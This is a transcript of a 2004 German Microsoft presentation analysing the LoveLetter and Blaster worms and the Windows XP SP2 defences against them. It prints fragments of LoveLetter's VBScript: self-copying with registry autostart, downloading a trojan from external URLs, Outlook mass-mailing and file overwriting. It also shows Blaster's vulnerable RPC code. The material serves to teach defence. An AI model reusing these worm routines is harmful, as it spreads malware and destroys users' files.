Die Präsentation wird geladen. Bitte warten

Die Präsentation wird geladen. Bitte warten

MGB 2003 Viren, Würmer, SP2 Uwe Baumann Dirk Primbs .NET Community Evangelists Microsoft Deutschland GmbH uwebaum@microsoft.com dirkp@microsoft.com © 2004.

Ähnliche Präsentationen


Präsentation zum Thema: "MGB 2003 Viren, Würmer, SP2 Uwe Baumann Dirk Primbs .NET Community Evangelists Microsoft Deutschland GmbH uwebaum@microsoft.com dirkp@microsoft.com © 2004."—  Präsentation transkript:

1 MGB 2003 Viren, Würmer, SP2 Uwe Baumann Dirk Primbs .NET Community Evangelists Microsoft Deutschland GmbH © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

2 Sicherheit ist eine der größten und wichtigsten Aufgaben, die unsere Industrie jemals angehen musste. Es geht nicht nur darum, einfach ein paar Sicherheitslöcher zu schließen und weiterzumachen. Die negativen Auswirkungen von Viren und Würmern auf ein akzeptables Niveau herunterzuschrauben erfordert ein fundamental neues Denken über Softwarequalität, ständige Verbesserungen bei Tools und Prozessen, und anhaltende Investitionen in widerstandsfähige neue Sicherheitstechnologien, die bösartigen oder zerstörerischen Code blocken, bevor Schaden entsteht [...] Der technologische Fortschritt in den letzten zwei Jahrzehnten ist unglaublich, und ist viel zu wichtig, als daß wir ein paar Kriminellen erlauben dürfen, uns davon abzuhalten, die fantastischen Errungenschaften der Technologie zu genießen. Bill Gates, 31. März 2004

3 Viren, Würmer, Trojaner Zwei typische Vertreter Wurm Inside
LoveLetter und Blaster Wurm Inside So funktionieren LoveLetter und Blaster Harte Lektionen Warum konnte das geschehen? Aus Schaden wird man klug Hilfe, mein Code geht nicht mehr! „Kann man das auch ausschalten?“

4 Als die Liebe die Welt regierte
Love Letter Als die Liebe die Welt regierte

5 16:00 Uhr Der erste Clone taucht auf („Funny Joke“)
Donnerstag, 4. Mai 4:12 Uhr Antivirus-Hersteller in Europa empfangen die ersten Meldungen von Kunden und beginnen um ca. 5:00 Uhr mit der Analyse. Es wird schnell klar: Der Wurm, geschrieben in VB Script, ist nicht sehr kompliziert, aber extrem ansteckend. Mittwoch, 3. Mai 2000 Ein neuer Wurm taucht auf. Unter den ersten „Patienten“ sind Microsoft Deutschland, Lucent Technology Europa und Credit Suisse Ca. 7:00 Uhr ... in Melbourne klickt ein Mitarbeiter des Reiseführer-Verlags „Lonely Planet“ auf das Wurm-Script und verschickt den Wurm an 100 Reiseführer-Autoren in der ganzen Welt… 18:40 Uhr Viele Antivirus-Hersteller machen Virus-Definitionsfiles zum freien Download über das Web verfügbar. Dienstag, 9. Mai Virusmeldungen aus aller Welt gehen zurück. Insgesamt sind jetzt 29 Varianten im Umlauf, eine halbe Million PCs wurden infiziert. 16:00 Uhr Der erste Clone taucht auf („Funny Joke“) Mittwoch, 4. Mai :00 Uhr Der Wurm trifft im Pentagon und bei der CIA ein. Das FBI nimmt die Ermittlungen auf. Ab 7 Uhr … und an der Ostküste der USA klicken Tausende liebeshungrige Büroangestellte nach einem frustrierenden Wochenende auf die Mail in der Hoffnung auf ein Rendez-Vouz 7:00 Uhr Antivirus-Hersteller verschicken die ersten Versionen der Virendefinition an ihre Kunden, aber es ist bereits zu spät denn… Vormittag Mitarbeiter des philippinischen Internetproviders „Sky Internet“ bemerken eine drastisch erhöhte Anzahl von Downloads auf ihren Servern. Der Wurm lädt dort einen Trojaner herunter, der Passwörter ausspioniert und an zwei -Adressen versendet. Der Provider schaltet die betroffenen Server ab. Freitag, 5. Mai Mittlerweile sind 9 weitere Varianten im Umlauf, getarnt als Muttertagsmail und als Nachricht des Antiviren-Herstellers Symantec Quelle: PCWorld.com

6 Reproduktion Verschickt sich als Attachment an -Adressen aus dem Outlook-Addressbuch des Benutzers Verschickt sich über IRC mit Hilfe des DCC Features (Direct Client-to-Client)

7 Aktionen Ersetzt Files mit Kopien des eigenen Codes
Startet Download eines Trojaners Verschickt sich selbst über Infiziert (überschreibt) Files Erstellt ein mIRC Script Verändert die Startseite des Internet Explorers

8 Inside LoveLetter Analyse des VBS-Skripts

9 Code: Selbstkopien erstellen
Set wscr=CreateObject("WScript.Shell") Set dirwin = fso.GetSpecialFolder(0) Set dirsystem = fso.GetSpecialFolder(1) Set dirtemp = fso.GetSpecialFolder(2) Set c = fso.GetFile(WScript.ScriptFullName) c.Copy(dirsystem&"\MSKernel32.vbs") c.Copy(dirwin&"\Win32DLL.vbs") c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ Run\MSKernel32",dirsystem&"\MSKernel32.vbs" RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"

10 Code: Trojaner downloaden
Randomize num = Int((4 * Rnd) + 1) if num = 1 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "http://www.skyinet.net/~young1s/[…]HJKhjnjbvYT/WINBUGSFIX.exe" elseif num = 2 then regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\ Start Page","http://www.skyinet.net/~angelcat/ […]skladjflfd/WIN-BUGSFIX.exe" elseif num = 3 then "http://www.skyinet.net/~koichi/[…]TRjkcbGRfF/WIN-BUGSFIX.exe" elseif num = 4 then "http://www.skyinet.net/~chu/[…]sdgfhjjgcb/WIN-BUGSFIX.exe" end if

11 Code: Massenmail schicken
set regedit=CreateObject("WScript.Shell") set out=WScript.CreateObject("Outlook.Application") set mapi=out.GetNameSpace("MAPI") set a=mapi.AddressLists(ctrlists) x=1 for ctrentries=1 to a.AddressEntries.Count set male=out.CreateItem(0) male.Recipients.Add(malead) male.Subject = "ILOVEYOU" male.Body = vbcrlf&"kindly check the attached LOVELETTER coming from me." male.Attachments.Add(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs") male.Send x=x+1 next

12 Code: Files infizieren
set f = fso.GetFolder(folderspec) set fc = f.Files for each f1 in fc ext=fso.GetExtensionName(f1.path) ext=lcase(ext) s=lcase(f1.name) elseif(ext="jpg") or (ext="jpeg") then set ap=fso.OpenTextFile(f1.path,2,true) ap.write vbscopy ap.close set cop=fso.GetFile(f1.path) cop.copy(f1.path&".vbs") fso.DeleteFile(f1.path) next

13 Das Ende vom Lied 10 Milliarden US$ Schaden (geschätzt)
Unzählige Nachahmer Wahrscheinlicher Autor: Philippinischer Student Motiv: Entweder ein Versehen oder die Rache für eine zurückgewiesene Semesterarbeit Verurteilung des Autors nach damals in den Philippinen geltendem Recht nicht möglich

14 Lektionen aus Love Letter
Love Letter vertraute darauf, daß… … der Empfänger Mailattachements öffnet wenn die von bekannten Absendern stammt. … der Empfänger ausreichende Rechte hat um von sich selbst Kopien in Systemverzeichnissen zu erstellen. ... Mails vollautomatisch verschickt werden können.

15 Maßnahmen I Hinweismeldungen von Office-Applikationen, bevor …
MGB 2003 Maßnahmen I Hinweismeldungen von Office-Applikationen, bevor … … VBA-Code ausgeführt wird. … Scripts ausgeführt werden. … Outlook automatisiert werden kann. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

16 Maßnahmen II Neue Sicherheitsoptionen für die Preview Pane in Outlook
MGB 2003 Maßnahmen II Neue Sicherheitsoptionen für die Preview Pane in Outlook Ausführbare Attachements werden blockiert: Mail-Previews laufen in der „Restricted Sites“ Internet Zone © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

17 Windows XP Service Pack 2
Neue Mail-Preview für Outlook Express Zone „Local Machine“ restriktiver vorkonfiguriert Neue zentrale API zum Handling von Attachements: Attachement Execution Services (AES) Schnittstelle IAttachementExecute Zentralisiert die Risiko-Abschätzung Steuerbar über Group Policies

18 Bitte wenden Sie sich an Ihren Administrator 
MGB 2003 Bitte wenden Sie sich an Ihren Administrator  Als Nicht-Administrator wäre es Love Letter nicht möglich gewesen, … … sich in HKLM\…\Run einzutragen. … in ein Systemverzeichnis zu schreiben. … Betriebssystembestandteile auszutauschen. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

19 Ein Tag im Leben eines Nicht-Administrators
MGB 2003 Ein Tag im Leben eines Nicht-Administrators © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

20 Das Security Problem Software Security Pendel
MGB 2003 Das Security Problem Software Security Pendel Einfache Benutzung “Automagic” Alle Features sind ON by default Große Angriffsfläche Out Of The Box Experience Features Attacks Marketing Mode Usability & Features Security Privacy © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

21 Das Security Problem Software Security Pendel
MGB 2003 Das Security Problem Software Security Pendel Geringe “connectivity” Viele Sicherheitsdialoge Minimierte Angriffsfläche Oft schwerer zu benutzen Nur schwer zu vermarkten Paranoid Mode Usability & Features Security Privacy © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

22 Das Security Problem Software Security Pendel
MGB 2003 Das Security Problem Software Security Pendel Kleinere Angriffsfläche Weniger Sicherheits-Dialoge Transparente Einstellung Konfigurierbar Sicher handhabbar! Security & Privacy als Feature für den Anwender Optimum Usability & Features Security Privacy © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

23 Blaster Mach mal Pause!

24 Reproduktion Wurmcode lädt EXE-Datei „MSBLAST.EXE“ von angreifendem, bereits infizierten System und führt diese lokal aus Die EXE-Datei scannt weitere Systeme und infiziert diese mit dem Wurmcode

25 Aktionen Startet Denial-of-Service Angriff auf Bringt Computer zum Absturz (als Nebeneffekt)

26 Inside Blaster Grundlagen: Buffer Overrun
Analyse der angreifbaren Stelle im Windows-Sourcecode

27 Buffer Overrun: Das Prinzip [1]
void main() { char myLongBuffer[256]; myFunction(myBuffer); } void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); Was passiert, wenn der übergebene String größer als 16 Zeichen ist?

28 Buffer Overrun: Das Prinzip [2]
Stack void main() { char myLongBuffer[256]; myFunction(myLongBuffer); } Strings MyShortBuffer Gehackte Adresse MyShortBuffer 16 MyShortBuffer 16 256 void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); } Sonstige Daten Virus ausführen Rücksprungadresse 256 MyLongBuffer Daten sind zu lang ! Rücksprung an gehackte Adresse… (bisheriger Stackinhalt) Stack Gehackte Adresse Viruscode „Böser“ Inhalt von MyShortBuffer:

29 Code: Blasters Angriffsziel
Port 135 (Z.B. aus dem Internet) error_status_t _RemoteActivation(WCHAR *pwszObjectName, ) { *phr = GetServerPath(pwszObjectName, &pwszObjectName); … } HRESULT GetServerPath(WCHAR *pwszPath, WCHAR **pwszServerPath ){ WCHAR * pwszFinalPath = pwszPath; WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]; hr = GetMachineName(pwszPath, wszMachineName); *pwszServerPath = pwszFinalPath; } HRESULT GetMachineName( WCHAR * pwszPath, WCHAR wszMachineName[MAX_COMPUTERNAME_LENGTH_FQDN + 1]) { pwszServerName = wszMachineName; LPWSTR pwszTemp = pwszPath + 2; while ( *pwszTemp != L'\\' ) *pwszServerName++ = *pwszTemp++; !!!

30 Ist das wirklich so einfach?
Ausnützen der Sicherheitslöcher ist nicht trivial! Analyse der Verwundbarkeit Sourcecode liegt (oft) nicht vor Virenbaukästen („Kits“) helfen beim Bau einfacher Viren und Trojaner, aber… Exploits werden immer schwieriger Extrem detaillierte Kentnisse sind notwendig Unmöglich ohne viel Zeit und Wissen

31 Sorgen eines Hackers Sprungadresse zu eigenem Code finden
„NOP-Sledge“ oder gutes Raten DLL-Funktionen aufrufen DLL-Basisadresse? Funktions-Einsprungpunkt? Prozeß abspalten Keine native Win32-Funktion verfügbar Platz für Literale ( z.B. Funktionsnamen) Hashing notwendig Keine Null im Code erlaubt Decoder-Stub nötig Grrr!

32 Das Ende vom Lied 5-10 Millionen US$ Schaden
8 Millionen infizierte Computer Autor immer noch nicht bekannt Einige Nachahmer vor Gericht

33 Lektionen aus Blaster Blaster nutzte eine Sicherheitslücke im Betriebssystem aus Aktivierte Firewalls hätten Blaster im Vorfeld verhindert, aber… … schafft es Blaster in ein Unternehmensnetzwerk, helfen nur noch Personal Firewalls auf den einzelnen Systemen Zum Zeitpunkt der Verbreitung von Blaster gab es bereits seit nahezu einem Monat einen Patch, der aber nicht rechtzeitig eingespielt worden war

34 Maßnahmen gegen BOs Bestimmte C/C++ Kommandos sind besonders anfällig
strcpy, gets, scanf, sprintf, strcat, … BOs werden in Managed Code durch Laufzeitchecks verhindert. Compilerswitch /GC aktiviert in Visual C/C++ verbessertes Stackhandling

35 Nutzloses Wissen Special
Bergarbeiter mit Kanarienvogel (Welsh Miner‘s Canary) Prinzip: Vogel tot = zuviel Methangas Quelle: West Virginia Office of Miners’ Health, Safety and Training

36 (bisheriger Stackinhalt)
Compilerswitch /GC Stack void myFunction(char *myString) { char myShortBuffer[16]; strcpy(myShortBuffer, myString); } MyShortBuffer Strings MyShortBuffer 16 Security Cookie Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen und speichert Zufallswert für Security Cookie (Canary) ab sub esp,24h mov eax,dword ptr [___security_cookie (408040h)] xor eax,dword ptr [esp+24h] mov dword ptr [esp+20h],eax Prolog: Alloziiert Speicher auf dem Stack für lokale Variablen sub esp,20h Rücksprungadresse 256 MyLongBuffer (bisheriger Stackinhalt) Stack Epilog: Prüft den Security Cookie (Canary) und führt anchließend Rücksprung durch mov ecx,dword ptr [esp+20h] xor ecx,dword ptr [esp+24h] add esp,24h jmp __security_check_cookie (4010B2h) Epilog: Führt Rücksprung durch add esp,20h ret

37 Vertrauen ist gut, Kontrolle ist besser
MGB 2003 Vertrauen ist gut, Kontrolle ist besser © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

38 Patchmanagement Definition: Patch
Patches beheben gefundene Security Vulnerabilities werden von Microsoft in Sicherheits-Bulletins veröffentlicht (z.B. MS03-47) Patches werden in Rollup-Packages und Service Packs zusammengefasst Vulnerabilities werden von Microsoft in 4 Schweregrade eingeteilt

39 Patchmanagement Enstehung des Blaster Wurms
MGB 2003 Patchmanagement Enstehung des Blaster Wurms 1. Juli 03 16. Juli 03 25. Juli 03 11. August 03 Schwachstelle entdeckt / Start der Patchentwicklung Bulletin & Patch Verfügbar Bisher kein Angriff Angriffs-Code wird veröffentlicht Wurm infiziert die Welt Report Schwachstelle in RPC/DDOM aufgedeckt MS startet den höchsten Notfall-prozess Level Bulletin MS wir an Kunden ausgeliefert Kontinuierliche Kommunikation mit Analysten, Presse, Community, Partner, Regierungsbehörden Exploit X-focus (Chinesische Security-Spezialisten) veröffentlicht Angriffs-Tool MS maximiert die Anstrengungen, alle Kunden zu informieren Worm Blaster Wurm entdeckt Varianten und andere Viren schlagen gemeinsam zu (z.B. “SoBig”) Blaster zeigt das komplexe Zusammenspiel zwischen Sicherheitsforschung, Softwarehersteller und Hackern © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

40 Patchmanagement Reaktionszeit
Tage zwischen Patch und Angriff Zeitspanne zwischen erscheinen des Patches und Auftreten eines Exploits sinkt Exploits werden intelligenter Ansatz Patch Management reicht nicht Neue Techniken müssen entwickelt werden 151 180 331 Blaster Welchia/ Nachi Nimda 25 SQL Slammer

41 Windows XP SP2 Verbessertes Patchmanagement “hot patching” Technologie
MGB 2003 Windows XP SP2 Verbessertes Patchmanagement Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools “hot patching” Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

42 Windows XP SP2 Execution Protection (no-execute, NX)
MGB 2003 Windows XP SP2 Execution Protection (no-execute, NX) Speicher wird als Datenspeicher markiert Der Versuch, im NX-Bereich Code auszuführen führt zu einer Exception Muß von Hardware unterstützt werden © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

43 Internet Connection Firewall
MGB 2003 Internet Connection Firewall Ab SP2 ist die ICF “ON by default” Boot time protection Verbesserte Konfigurationsmöglichkeiten Group Policy, Kommandozeile Verbesserte Benutzeroberfläche Programmatisch: INetFwV4AuthorizedApplication, INetFwV4AuthorizedApplications, INetFwV4Mgr, INetFwV4Policy, INetFwV4Profile © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

44 Internet Connection Firewall II
MGB 2003 Internet Connection Firewall II Drei Betriebsmodi Aktiviert (Standard) Alle eingehende Verbindungen werden blockiert, Ausnahme: Für in einer „White List“ erfasste Programme werden Ports bei Bedarf geöffnet Aktiviert - keine Ausnahmen „Shielded Mode“, es werden keine eingehenden Verbindungen zugelassen Deaktiviert © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

45 Windows XP SP2 – Weitere Änderungen
MGB 2003 Windows XP SP2 – Weitere Änderungen Unterbindung von anonymen RPC-Aufrufen Neuer Registry-Key steuert das Verhalten: \\HKLM\SOFTWARE\Policies\Microsoft\Windows NT\RPC\RestrictRemoteClients RPC_RESTRICT_REMOTE_CLIENT_NONE (0) – bisheriges Verhalten RPC_RESTRICT_REMOTE_CLIENT_DEFAULT (1) – Anonyme Zugriffe werden zurückgewiesen. Standarteinstellung RPC_RESTRICT_REMOTE_CLIENT_HIGH (2) – genauso wie zuvor, mit der Ausnahme, daß das RPC_IF_ALLOW_CALLBACKS_WITH_NO_AUTH flag keine Wirkung mehr hat. DCOM: Globale Konfiguration von Zugriffsrechten Die meisten lokalen Szenarien funktionieren ohne Änderung Remote: Nur Administratoren haben by default das Recht Applikationen zu aktivieren (Activation) und zu starten (Launch) © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

46 “Security is designed to make your system not work” (Michael Howard)
MGB 2003 Was tun, wenn nichts mehr geht? “Security is designed to make your system not work” (Michael Howard) © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

47 Fazit Viele Viren benutzen einfache Mechanismen um sich zu Systemen Zugang zu verschaffen Durch gezielte Maßnahmen kann die Anfälligkeit einer Applikation bzw. eines Systems deutlich gesenkt werden

48 © 2004 Microsoft Corporation. All rights reserved.
MGB 2003 © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

49 Referenzen Marshall Brain: “How Stuff Works: Computer Viruses” Ulf Larson: „VBS.LoveLetter: A Study of the LoveLetter worm“

50 Referenzen Slipstick Systems : „Protecting Microsoft Outlook against Viruses“ Bill Gates: „Microsoft Progress Report: Security“

51 Referenzen PC World: "When Love Came to Town: A Virus Investigation“ XP Service Pack 2 for Developers

52 Referenzen Microsoft Developer Security Center Microsoft Security Center Compiler Security Checks in Depth

53 Referenzen Microsoft Baseline Security Analyzer Microsoft Compatibility Toolkit (Application Verifier) fxCop

54 Referenzen Developing Software with Non-Administrative privileges West Virginia Office for Mine Safety: Historic Photos

55 Windows XP SP2 Firewalling
MGB 2003 Windows XP SP2 Firewalling ICF “ON by default” in allen Konfigurationen LAN, Dial-Up, 3rd Party Tools (T-Online) Mehr Konfigurationsmöglichkeiten Group policy, command line, unattended setup Besseres User Interface Boot time protection Unterstützung mehrerer Profile Firmennetz vs. Heimnetzwerk © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

56 Windows XP SP2 Email-Sicherheit
MGB 2003 Windows XP SP2 -Sicherheit API für sicheres Handling von Attachments (Attachment Execution Services) Default: Do not trust unsafe attachments! Outlook, Outlook Express, Windows Messenger, Internet Explorer verwenden diese neue API Öffnen und Ausführen von Attachments mit so wenig Privilegien wie möglich Sicheres “Message Preview” © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

57 Windows XP SP2 Internet Explorer
MGB 2003 Windows XP SP2 Internet Explorer Immer Benachrichtigungen bei installierenden und ausgeführten ActiveX Controls HTML Dateien auf der lokalen Maschine sind nicht in der Lage: unsichere ActiveX Controls auszuführen auf Daten in der Local Machine Zone zuzugreifen Unbekannten und unsignierte ActiveX Controls werden geblockt In Windows XP SP2 wird Microsoft Sicherheitstechnologien zum Schutz von Clients gegen die wichtigsten Angriffsvektoren: Netzwerk, , Browser und Speicherschutz. Windows Server 2003 SP1 werden SicherheitstechnologieN für Server und Unternehmensnetze integriert. Beim Server wird durch neue Sicherheitskonfigurationen (Härtung mittels dedizierter Serverrollen) die Angrifffläche weiter verringert. Durch Quarantänetechnologie wird nur Clients ins Netzwerk gewährt, die den definierten Sicherheitsrichtlinien entsprechen (z.B. Patchlevel oder Antivirensignatur) Weitere Details in Englisch Windows XP SP2 Improved Firewall. Windows XP will help provide better protection against network-based attacks, like Blaster, by closing unnecessary ports. This will be done through enhancements to Windows XP Internet Connection Firewall which include protection turned on by default, an improved interface that makes configuration easier, improved application compatibility when ICF is on, and enhanced enterprise administration through Group Policy. Safer and instant messaging. Windows XP will help stop viruses like SoBig.F that spread via e‑mail and instant messaging through more secure default settings, improved attachment blocking for Outlook Express and Windows Messenges  and increased Outlook Express security and reliability. Safer Web browsing. Windows XP will provide improved protection against malicious content on the Web by including better protection against harmful Web downloads, better user controls to prevent malicious ActiveX controls and Spyware, and the reduced potential for IE buffer overruns. Memory protection. Some potential buffer overruns in Windows XP will be mitigated by preventing the execution of malicious code in memory normally reserved for data. Improvements include compiler checks—through recompiling core Windows binaries with /GS—to reduce stack overruns, better heap overrun protection, and support for No-Execute, a new processor innovations that helps prevent stack and heap overruns. Windows Server 2003 SP1 The difference between the server and the client is that servers need to continue listening to the network—you cant just turn off all the ports. So for server this means that we need to focus on reducing the attack surface area by locking down the default configurations by server role and we need to enable you to identify infected systems that come onto the network and separate them until they are patched/no longer infected. Role based config: Continuing the work we did on WS03 to lock down the system by turning things off by default, with role based config we will make it easier to lock down the system for ALL server roles with secure defaults. This is similar to what we did with IIS 6/0 but now applied to all server roles. Specifically, what we will deliver here is a set of templates that have customized configurations and settings by role that can be used via GPO or a wizard UI to apply these best practices. Remote access client inspection: When a user connects via a VPN to your network, you need the ability to check that system and ensure that it complies with your “security defaults. If it does not, with this new technology we will enable you to block this system from attaching to the network until it is no longer infected. This work is based on best practices that MS has developed internally for its own IT operations. Apply this to the local machines to get protection benefits for the internal network. © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

58 Windows XP SP2 Internet Explorer
MGB 2003 Windows XP SP2 Internet Explorer Verbessert Behandlung von geladenen Dateien durch besseres MIME-Handling nicht passende oder fehlende MIME-Header und Dateierweiterungen werden geblockt Automatisches Öffnen von Pop-up Fenstern wird verhindert es sein denn, der Benutzer stimmt ihnen zu Verringertes UI-Spoofing © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

59 Windows XP SP2 Update-Prozess
MGB 2003 Windows XP SP2 Update-Prozess Automatische zeitgesteuerte Installation Priorisierung beim Patch-Download Reduzierte Patch-Größe mit Delta-Patching Gleiche Scanning-Engine für alle Tools “hot patching” Technologie Reduzierte Anzahl von Reboots Restart Explorer und einige SVCHOST Prozesse an statt kompletten Reboot © 2004 Microsoft Corporation. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.

60 Improved Email Security
Attachment Execution Services (AES) What? OS service that protects the system from malicious attachments and prompts in low-risk scenarios Unified approach to be used by Outlook, OE, and Windows Messenger Why? Too many trust decisions being made by users Impossible to make a complete list of malicious file types Each app handles attachments differently Why should I care? If you develop an app that executes or saves attachments your app may break

61 Attachment Execution Services
Gives each attachment a risk rating Based on extension, content-type, registered handlers, etc. Risk rating is mapped to a policy associated with IE Zones Developers should use the IAttachmentExecute COM interface as the entry point Replaces calls to AssocIsDangerous and custom UIs in the simplest case

62 Attachment Execution Services
Default Zone Policy Restricted Internet Intranet Local Trusted High Risk Block Prompt Allow Med. Risk Low Risk

63 Attachment Execution Services
IAttachmentExecute Interface CheckPolicy() Replaces client interpretation of AssocIsDangerous() and custom policy/configuration. Examines available evidence and checks the resulting policy PromptUser() Replaces custom prompts for user trust. Can be called by the application to force user interface (UI) at an earlier point, even before the file is copied to disk Execute Replaces call to ShellExecute(). Ensures CheckPolicy() and PromptUser() are called as needed. Calls the IAttachmentExecute::PromptUser() with an EXEC action Save() Ensures CheckPolicy () is called as needed. Saves evidence to the attachment


Herunterladen ppt "MGB 2003 Viren, Würmer, SP2 Uwe Baumann Dirk Primbs .NET Community Evangelists Microsoft Deutschland GmbH uwebaum@microsoft.com dirkp@microsoft.com © 2004."

Ähnliche Präsentationen


Google-Anzeigen